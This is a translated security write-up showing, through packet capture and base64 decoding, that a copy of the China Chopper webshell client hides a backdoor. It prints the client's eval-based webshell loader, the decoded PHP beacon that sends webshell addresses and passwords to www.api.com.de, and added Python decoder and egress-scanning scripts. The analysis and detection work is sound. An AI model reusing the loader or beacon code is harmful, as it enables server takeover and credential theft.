Technical Secrets: How to analyze whether China Chopper (the "Chinese kitchen knife" webshell client) contains a backdoor
0x00 Preface
There is an old saying in China: "Walk along the river often enough and your shoes will eventually get wet." Many tools circulating on the Internet contain backdoors. SSH Secure Shell Client, for example, has been reported to carry one, and a cracked Chinese version of PuTTY was found to contain a backdoor that stole administrator accounts. A backdoor planted in a tool lets whoever planted it continuously harvest the login accounts and passwords that the tool's users type in, and with them server and webshell access. So does the well-known webshell management tool China Chopper contain a backdoor? The analysis in this article answers that question.
0x01 China Chopper overview
Software name: China Chopper (中国菜刀, literally "Chinese kitchen knife"). Despite the name it is not a cooking utensil but a professional website management tool: widely used, easy to use, small and practical. Any website that supports dynamic server-side scripts can be managed with it. Program size: 214 KB. In a non-Simplified-Chinese environment it automatically switches to an English interface. It is compiled as Unicode and supports multi-language input and display.
Official website: www.maicaidao.com. The official site stopped providing service in 2014; the final version was distributed as http://bbs.mgame.baidu.com/data/attachment/forum/201305/31/index.zip
0x02 Test environment preparation
(1) Install ComsenzEXP (a bundled PHP web server environment) on the local machine: http://www.comsenz.com/downloads/install/exp
(2) Create a test webshell PHP file under wwwroot in the ComsenzEXP installation directory; this is the "backdoor" page that China Chopper will connect to.
(3) The WSockExpert_Cn packet capture program.
(4) The Encode program (URL and base64 encoder/decoder).
(5) A copy of China Chopper that contains the backdoor.
0x03 Analysis: recovering the backdoor
(1) Create a new China Chopper record
Create a new record in China Chopper and add the address of the test webshell created in step (2) of the preparation, http://127.0.0.1/1.php, with the password "x", as shown in Figure 1.
Figure 1 Creating a webshell management record
(2) Set WSockExpert to capture packets
Open WSockExpert (any other packet capture software will do as well) and select the process to listen to with the open-folder icon button; in this example, select "China Chopper", as shown in Figure 2. Once configured, WSockExpert listens to China Chopper and records the packets and other data it exchanges during communication.
Figure 2 Configuring the WSockExpert packet capture software
(3) Open the webshell with China Chopper
Open the webshell record http://127.0.0.1/1.php in China Chopper, as shown in Figure 3. From here you can view, delete, upload and otherwise operate on files on the computer where the webshell is located.
Figure 3 Opening the webshell
(4) Obtain the captured data
In the WSockExpert window you can view the captured packet records. Select the second record, as shown in Figure 4, and copy the packet body, which reads as follows (the z0 value is truncated here):
x=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3B&z0=[...]%2FJHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7
The code above is URL-encoded and cannot be read directly.
Figure 4 Viewing the captured packets
(5) Decode the URL-encoded data
Copy the data obtained above into Encode, as shown in Figure 5. Select the URI type and click Decoder to decode it (Encoder, conversely, encodes the content of the input box).
Figure 5 Decoding the URL-encoded data
After decoding, the data becomes (z0 again truncated):
x=$_=strrev(edoced_46esab);@eval($_($_POST[z0]));&z0=[...]
Note what the x parameter does: strrev("edoced_46esab") yields "base64_decode", so the server simply base64-decodes z0 and passes the result to eval(). Copy the decoded data after "z0=" into the Encode input box and select base64 decoding, as shown in Figure 6, to obtain the result of the first base64 decoding. The part marked in red is still base64-encoded:
@eval(base64_decode('aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWtlJywxKTtAZmlsZSgnaHR0cDovL3d3dy5hcGkuY29tLmRlL0FwaS5waHA/VXJsPScuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLicmUGFzcz0nLmtleSgkX1BPU1QpKTt9'));
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}\t";
if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}
$R.="\t";
$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';
$usr=($u)?$u['name']:@get_current_user();
$R.=php_uname();
$R.="({$usr})";
print $R;;
echo("|<-");
die();
Figure 6 First base64 decoding
Everything after the first line is the normal China Chopper "system information" command; the first line is not. Copy the base64 string marked in red above into the Encode input box and select base64 decoding, as shown in Figure 7, to obtain the backdoor code:
if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('http://www.api.com.de/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST));}
Here
http://www.api.com.de/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST)
is the backdoor's receiving address. When an attacker opens a webshell with this copy of China Chopper, the webshell's address (HTTP_HOST plus REQUEST_URI) and its password are sent to the website www.api.com.de. The password is obtained with key($_POST): China Chopper sends its commands in a POST parameter named after the webshell password, so the name of the first POST parameter is the password (in the capture above it is "x"). Two details matter for anyone investigating this: the Lyke cookie makes the report happen only once per client, so the beacon is easy to miss in a short capture, and @file() is executed by the compromised web server, so the request to www.api.com.de originates from the victim server rather than from the machine running China Chopper.
Figure 7 Obtaining the backdoor address
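The decoding chain in steps (4) and (5) can be automated. The following Python script is an added example written for this article, not a tool from the page or from the China Chopper project: it URL-decodes a captured POST body, resolves the strrev() trick in the x parameter, base64-decodes z0, peels every nested base64_decode('...') layer, and lists the URLs and $_SERVER variables the hidden code references. The nested base64 string is the one the article recovered; the surrounding z0 script is abbreviated from the page, and the request body is constructed by the script itself rather than taken from a capture.

```python
"""Decode a captured China Chopper POST body and surface any hidden callback.

Added example for this article. NESTED_B64 is the string the article recovered;
OUTER_PHP is abbreviated from the page; the request body is constructed here.
"""
import base64
import re
from urllib.parse import parse_qs, quote

# Nested base64 layer recovered in step (5) of the article; it hides the beacon.
NESTED_B64 = (
    "aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWtlJywxKTtAZmlsZSgnaHR0cDovL3d3dy5hcGku"
    "Y29tLmRlL0FwaS5waHA/VXJsPScuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLicm"
    "UGFzcz0nLmtleSgkX1BPU1QpKTt9"
)

# The z0 script, abbreviated from the page: the directory and user-collecting
# statements are dropped for brevity, the structure (beacon first) is unchanged.
OUTER_PHP = (
    "@eval(base64_decode('" + NESTED_B64 + "'));"
    + '@ini_set("display_errors","0");@set_time_limit(0);echo("->|");'
    + '$R=php_uname();print $R;echo("|<-");die();'
)

# The x parameter exactly as captured: strrev("edoced_46esab") == "base64_decode".
LOADER = "$_=strrev(edoced_46esab);@eval($_($_POST[z0]));"

B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
STRREV_CALL = re.compile(r"strrev\(\s*['\"]?([A-Za-z0-9_]+)['\"]?\s*\)")
URL = re.compile(r"https?://[^\s'\"]+")
SERVER_VAR = re.compile(r"\$_SERVER\[['\"](\w+)['\"]\]")


def build_sample_body() -> str:
    """Construct a POST body shaped like the one captured with WSockExpert."""
    z0 = base64.b64encode(OUTER_PHP.encode()).decode()
    # safe='' percent-encodes '+' and '/' in the base64, as the real client does.
    return f"x={quote(LOADER, safe='')}&z0={quote(z0, safe='')}"


def resolve_strrev(code: str) -> str:
    """Replace strrev(literal) with the reversed literal so the real call is visible."""
    return STRREV_CALL.sub(lambda m: m.group(1)[::-1], code)


def peel_base64_layers(script: str, max_depth: int = 8) -> list:
    """Return the script plus every nested base64_decode('...') payload, outermost first."""
    layers = [script]
    frontier = [script]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            for blob in B64_CALL.findall(text):
                try:
                    found.append(base64.b64decode(blob).decode("utf-8", "replace"))
                except ValueError:
                    continue  # not valid base64: leave that one to manual review
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def analyze_chopper_body(body: str) -> dict:
    """URL-decode, parse, base64-decode z0 and report the callback indicators."""
    params = parse_qs(body, keep_blank_values=True)
    loader = resolve_strrev(params.get("x", [""])[0])
    script = base64.b64decode(params.get("z0", [""])[0]).decode("utf-8", "replace")
    layers = peel_base64_layers(script)
    joined = "\n".join(layers)
    return {
        "loader": loader,
        "layers": layers,
        "callback_urls": list(dict.fromkeys(URL.findall(joined))),  # dedupe, keep order
        "server_vars_referenced": sorted(set(SERVER_VAR.findall(joined))),
        "sends_post_key": "key($_POST)" in joined,  # first POST name = webshell password
    }


if __name__ == "__main__":
    report = analyze_chopper_body(build_sample_body())
    print("loader:", report["loader"])
    for i, layer in enumerate(report["layers"]):
        print(f"--- layer {i} ---\n{layer[:200]}")
    print("callback URLs:", report["callback_urls"])
    print("server vars:", report["server_vars_referenced"],
          "| webshell password sent:", report["sends_post_key"])
```

Run it directly to print each decoded layer and the indicators. A body copied from a real packet capture works the same way, provided it is still percent-encoded: a literal "+" in the base64 would otherwise be turned into a space by parse_qs and the decode would fail.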
0x04 Postscript
The analysis above shows that this copy of China Chopper carries a backdoor: whenever the tool is used, the webshell record is automatically reported to a designated receiving website. So be careful with tools downloaded from the Internet: run them in a virtual machine whenever possible, and download them from the official website rather than from a third-party mirror.
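Because the beacon is issued by @file() on the compromised web server, the place to look for it on the defending side is the web server's outbound traffic rather than the operator's machine. The following Python script is an added example, not part of the article, that scans egress proxy log lines for the beacon's shape: a request to the recovered callback host, a query string carrying both a URL and a password, or a web server reporting its own address to an outside site. The log line format, the IP addresses and the WEB_SERVERS set are constructed for the example; the only value taken from the article is the callback host www.api.com.de.

```python
"""Flag web-server egress that matches the beacon behaviour recovered in the article.

Added example; log lines, addresses and the WEB_SERVERS set are constructed.
"""
from urllib.parse import parse_qs, urlsplit

# Addresses of our own web servers (constructed for the example).
WEB_SERVERS = {"10.0.0.5"}
# Callback host recovered in the article's analysis.
KNOWN_CALLBACK_HOSTS = {"www.api.com.de"}

# Constructed egress proxy log lines in the form "<src_ip> <method> <url>".
SAMPLE_EGRESS = [
    "10.0.0.5 GET http://mirror.example.test/debian/dists/stable/Release",
    "10.0.0.5 GET http://www.api.com.de/Api.php?Url=10.0.0.5/1.php&Pass=x",
    "10.0.0.7 GET http://www.example.test/login?Url=home&Pass=demo",
    "10.0.0.5 GET http://cdn.example.test/lib.js",
]


def beacon_reasons(line: str) -> list:
    """Return the reasons one log line looks like the webshell-reporting beacon."""
    src, _method, url = line.split(" ", 2)
    parts = urlsplit(url)
    # Normalise parameter names so Url/url/URL are treated alike.
    query = {k.lower(): v for k, v in parse_qs(parts.query).items()}
    values = [v for vals in query.values() for v in vals]
    reasons = []
    if parts.hostname in KNOWN_CALLBACK_HOSTS:
        reasons.append("destination is a known callback host")
    if "url" in query and "pass" in query:
        reasons.append("query carries a URL together with a password")
    if src in WEB_SERVERS and any(src in v for v in values):
        reasons.append("web server reports its own address in an outbound request")
    return reasons


def scan_egress(lines) -> dict:
    """Map each suspicious line to its reasons; clean lines are omitted."""
    hits = {}
    for line in lines:
        reasons = beacon_reasons(line)
        if reasons:
            hits[line] = reasons
    return hits


if __name__ == "__main__":
    for line, reasons in scan_egress(SAMPLE_EGRESS).items():
        print(line)
        for reason in reasons:
            print("   -", reason)
```

The third sample line shows why the reasons are reported separately: a login form that happens to use Url and Pass parameters trips one heuristic, while the real beacon trips all three, so an analyst can rank hits by how many reasons they collect rather than treating every match as an incident.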